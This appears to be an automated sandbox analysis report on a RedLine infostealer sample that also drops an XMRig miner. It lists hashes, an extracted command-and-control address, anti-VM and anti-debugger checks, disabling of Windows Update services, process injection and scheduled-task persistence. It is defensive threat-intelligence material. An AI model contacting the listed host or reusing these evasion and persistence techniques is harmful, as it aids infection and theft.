redline | 303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94

Analysis

max time kernel
302s
max time network
303s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
22-10-2022 04:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe
Size

344KB
MD5

8355f4fcb65efd4b4beed19a8282ce80
SHA1

a100aee7b677a151302b13a449524f65a19156b2
SHA256

303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94
SHA512

c5792f4aa7349467191bb37053b9eea3ab047432d6aeba3fb6970f46fede8db7fcffd130bc67f5e9c50d8dfd948df2a7a950f2d56296ac277c33de430633f5ad
SSDEEP

6144:gq6LFGh9VpSaYmn9EqgJ/ky4yuooh1S6E2B11vkbtIlzaa8+dpf3:gnwnu4EqPyuooz14WlzaaD

Score

10^/10

redline xmrig 875784825 evasion infostealer miner spyware themida trojan upx

Malware Config

Extracted

Family

redline

Botnet

875784825

79.137.192.6:8362

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/104164-378-0x000000000041972E-mapping.dmp	family_redline
behavioral2/memory/104164-462-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup12.exeupdater.exeMoUSO.exesetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup12.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MoUSO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/8292-1298-0x00007FF709CF0000-0x00007FF70A4E4000-memory.dmp	xmrig
behavioral2/memory/8292-1299-0x00007FF709CF0000-0x00007FF70A4E4000-memory.dmp	xmrig

Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

setup.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts setup.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 8 IoCs

Processes:

setup.exesetup12.exesetup1232.exewatchdog.exeupdater.exeMoUSO.exeChomiumPath.exesvcupdater.exe

pid process

2108 setup.exe
5108 setup12.exe
4312 setup1232.exe
5036 watchdog.exe
2224 updater.exe
4688 MoUSO.exe
7892 ChomiumPath.exe
8380 svcupdater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	setup.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

pid	process
2108	setup.exe
5108	setup12.exe
4312	setup1232.exe
5036	watchdog.exe
2224	updater.exe
4688	MoUSO.exe
7892	ChomiumPath.exe
8380	svcupdater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/8292-1298-0x00007FF709CF0000-0x00007FF70A4E4000-memory.dmp	upx
behavioral2/memory/8292-1299-0x00007FF709CF0000-0x00007FF70A4E4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

updater.exeMoUSO.exesetup.exesetup12.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup12.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup12.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

MoUSO.exesetup12.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Wine	MoUSO.exe
Key opened	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Wine	setup12.exe

Themida packer 15 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\setup.exe	themida
behavioral2/memory/2108-128-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp	themida
behavioral2/memory/2108-129-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp	themida
behavioral2/memory/2108-131-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp	themida
behavioral2/memory/2108-132-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp	themida
behavioral2/memory/2108-133-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp	themida
behavioral2/memory/2108-134-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp	themida
behavioral2/memory/2108-153-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\setup.exe	themida
behavioral2/memory/2108-414-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/2224-444-0x00007FF711280000-0x00007FF711F7A000-memory.dmp	themida
behavioral2/memory/2224-527-0x00007FF711280000-0x00007FF711F7A000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/2224-1296-0x00007FF711280000-0x00007FF711F7A000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

setup.exesetup12.exeupdater.exeMoUSO.exe

pid process

2108 setup.exe
5108 setup12.exe
2224 updater.exe
4688 MoUSO.exe

pid	process
2108	setup.exe
5108	setup12.exe
2224	updater.exe
4688	MoUSO.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exesetup1232.exewatchdog.exeupdater.exe

description	pid	process	target process
PID 3968 set thread context of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 4312 set thread context of 4680	4312	setup1232.exe	MSBuild.exe
PID 5036 set thread context of 104164	5036	watchdog.exe	vbc.exe
PID 2224 set thread context of 8140	2224	updater.exe	conhost.exe
PID 2224 set thread context of 8292	2224	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

setup.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5544 sc.exe
748 sc.exe
5512 sc.exe
1596 sc.exe
2128 sc.exe
5608 sc.exe
5624 sc.exe
5640 sc.exe
1544 sc.exe
1788 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

8120 schtasks.exe
4576 schtasks.exe

pid	process
5544	sc.exe
748	sc.exe
5512	sc.exe
1596	sc.exe
2128	sc.exe
5608	sc.exe
5624	sc.exe
5640	sc.exe
1544	sc.exe
1788	sc.exe

pid	process
8120	schtasks.exe
4576	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exesetup12.exepowershell.exepowershell.exeMoUSO.exe

pid	process
1104	powershell.exe
1104	powershell.exe
5108	setup12.exe
5108	setup12.exe
1104	powershell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe
104380	powershell.exe
104380	powershell.exe
104380	powershell.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe
4688	MoUSO.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

644

pid	process
644

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeIncreaseQuotaPrivilege	1104	powershell.exe
Token: SeSecurityPrivilege	1104	powershell.exe
Token: SeTakeOwnershipPrivilege	1104	powershell.exe
Token: SeLoadDriverPrivilege	1104	powershell.exe
Token: SeSystemProfilePrivilege	1104	powershell.exe
Token: SeSystemtimePrivilege	1104	powershell.exe
Token: SeProfSingleProcessPrivilege	1104	powershell.exe
Token: SeIncBasePriorityPrivilege	1104	powershell.exe
Token: SeCreatePagefilePrivilege	1104	powershell.exe
Token: SeBackupPrivilege	1104	powershell.exe
Token: SeRestorePrivilege	1104	powershell.exe
Token: SeShutdownPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeSystemEnvironmentPrivilege	1104	powershell.exe
Token: SeRemoteShutdownPrivilege	1104	powershell.exe
Token: SeUndockPrivilege	1104	powershell.exe
Token: SeManageVolumePrivilege	1104	powershell.exe
Token: 33	1104	powershell.exe
Token: 34	1104	powershell.exe
Token: 35	1104	powershell.exe
Token: 36	1104	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeShutdownPrivilege	1388	powercfg.exe
Token: SeCreatePagefilePrivilege	1388	powercfg.exe
Token: SeShutdownPrivilege	508	powercfg.exe
Token: SeCreatePagefilePrivilege	508	powercfg.exe
Token: SeShutdownPrivilege	2284	powercfg.exe
Token: SeCreatePagefilePrivilege	2284	powercfg.exe
Token: SeShutdownPrivilege	2208	powercfg.exe
Token: SeCreatePagefilePrivilege	2208	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4860	powershell.exe
Token: SeSecurityPrivilege	4860	powershell.exe
Token: SeTakeOwnershipPrivilege	4860	powershell.exe
Token: SeLoadDriverPrivilege	4860	powershell.exe
Token: SeSystemProfilePrivilege	4860	powershell.exe
Token: SeSystemtimePrivilege	4860	powershell.exe
Token: SeProfSingleProcessPrivilege	4860	powershell.exe
Token: SeIncBasePriorityPrivilege	4860	powershell.exe
Token: SeCreatePagefilePrivilege	4860	powershell.exe
Token: SeBackupPrivilege	4860	powershell.exe
Token: SeRestorePrivilege	4860	powershell.exe
Token: SeShutdownPrivilege	4860	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeSystemEnvironmentPrivilege	4860	powershell.exe
Token: SeRemoteShutdownPrivilege	4860	powershell.exe
Token: SeUndockPrivilege	4860	powershell.exe
Token: SeManageVolumePrivilege	4860	powershell.exe
Token: 33	4860	powershell.exe
Token: 34	4860	powershell.exe
Token: 35	4860	powershell.exe
Token: 36	4860	powershell.exe
Token: SeIncreaseQuotaPrivilege	4860	powershell.exe
Token: SeSecurityPrivilege	4860	powershell.exe
Token: SeTakeOwnershipPrivilege	4860	powershell.exe
Token: SeLoadDriverPrivilege	4860	powershell.exe
Token: SeSystemProfilePrivilege	4860	powershell.exe
Token: SeSystemtimePrivilege	4860	powershell.exe
Token: SeProfSingleProcessPrivilege	4860	powershell.exe
Token: SeIncBasePriorityPrivilege	4860	powershell.exe
Token: SeCreatePagefilePrivilege	4860	powershell.exe
Token: SeBackupPrivilege	4860	powershell.exe
Token: SeRestorePrivilege	4860	powershell.exe
Token: SeShutdownPrivilege	4860	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exeRegSvcs.exesetup.exesetup1232.execmd.execmd.exe

description	pid	process	target process
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 3968 wrote to memory of 5040	3968	303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe	RegSvcs.exe
PID 5040 wrote to memory of 2108	5040	RegSvcs.exe	setup.exe
PID 5040 wrote to memory of 2108	5040	RegSvcs.exe	setup.exe
PID 5040 wrote to memory of 5108	5040	RegSvcs.exe	setup12.exe
PID 5040 wrote to memory of 5108	5040	RegSvcs.exe	setup12.exe
PID 5040 wrote to memory of 5108	5040	RegSvcs.exe	setup12.exe
PID 2108 wrote to memory of 1104	2108	setup.exe	powershell.exe
PID 2108 wrote to memory of 1104	2108	setup.exe	powershell.exe
PID 5040 wrote to memory of 4312	5040	RegSvcs.exe	setup1232.exe
PID 5040 wrote to memory of 4312	5040	RegSvcs.exe	setup1232.exe
PID 4312 wrote to memory of 4680	4312	setup1232.exe	MSBuild.exe
PID 4312 wrote to memory of 4680	4312	setup1232.exe	MSBuild.exe
PID 4312 wrote to memory of 4680	4312	setup1232.exe	MSBuild.exe
PID 4312 wrote to memory of 4680	4312	setup1232.exe	MSBuild.exe
PID 4312 wrote to memory of 4680	4312	setup1232.exe	MSBuild.exe
PID 4312 wrote to memory of 4680	4312	setup1232.exe	MSBuild.exe
PID 4312 wrote to memory of 4680	4312	setup1232.exe	MSBuild.exe
PID 4312 wrote to memory of 4680	4312	setup1232.exe	MSBuild.exe
PID 2108 wrote to memory of 5012	2108	setup.exe	cmd.exe
PID 2108 wrote to memory of 5012	2108	setup.exe	cmd.exe
PID 2108 wrote to memory of 5008	2108	setup.exe	cmd.exe
PID 2108 wrote to memory of 5008	2108	setup.exe	cmd.exe
PID 2108 wrote to memory of 4860	2108	setup.exe	powershell.exe
PID 2108 wrote to memory of 4860	2108	setup.exe	powershell.exe
PID 5012 wrote to memory of 748	5012	cmd.exe	sc.exe
PID 5012 wrote to memory of 748	5012	cmd.exe	sc.exe
PID 5012 wrote to memory of 1544	5012	cmd.exe	sc.exe
PID 5012 wrote to memory of 1544	5012	cmd.exe	sc.exe
PID 5008 wrote to memory of 1388	5008	cmd.exe	powercfg.exe
PID 5008 wrote to memory of 1388	5008	cmd.exe	powercfg.exe
PID 5012 wrote to memory of 1788	5012	cmd.exe	sc.exe
PID 5012 wrote to memory of 1788	5012	cmd.exe	sc.exe
PID 5012 wrote to memory of 1596	5012	cmd.exe	sc.exe
PID 5012 wrote to memory of 1596	5012	cmd.exe	sc.exe
PID 5012 wrote to memory of 2128	5012	cmd.exe	sc.exe
PID 5012 wrote to memory of 2128	5012	cmd.exe	sc.exe
PID 5008 wrote to memory of 508	5008	cmd.exe	powercfg.exe
PID 5008 wrote to memory of 508	5008	cmd.exe	powercfg.exe
PID 5012 wrote to memory of 2580	5012	cmd.exe	reg.exe
PID 5012 wrote to memory of 2580	5012	cmd.exe	reg.exe
PID 5008 wrote to memory of 2284	5008	cmd.exe	powercfg.exe
PID 5008 wrote to memory of 2284	5008	cmd.exe	powercfg.exe
PID 5008 wrote to memory of 2208	5008	cmd.exe	powercfg.exe
PID 5008 wrote to memory of 2208	5008	cmd.exe	powercfg.exe
PID 5012 wrote to memory of 724	5012	cmd.exe	reg.exe
PID 5012 wrote to memory of 724	5012	cmd.exe	reg.exe
PID 5012 wrote to memory of 1856	5012	cmd.exe	reg.exe
PID 5012 wrote to memory of 1856	5012	cmd.exe	reg.exe
PID 5012 wrote to memory of 2692	5012	cmd.exe	reg.exe
PID 5012 wrote to memory of 2692	5012	cmd.exe	reg.exe
PID 5012 wrote to memory of 1936	5012	cmd.exe	reg.exe
PID 5012 wrote to memory of 1936	5012	cmd.exe	reg.exe
PID 5040 wrote to memory of 5036	5040	RegSvcs.exe	watchdog.exe
PID 5040 wrote to memory of 5036	5040	RegSvcs.exe	watchdog.exe

C:\Users\Admin\AppData\Local\Temp\303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe
"C:\Users\Admin\AppData\Local\Temp\303bcd9f1cb1c32438545312e1e204a453e2047fa4db1e13c90da39d86fe7a94.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3968

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:5040

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
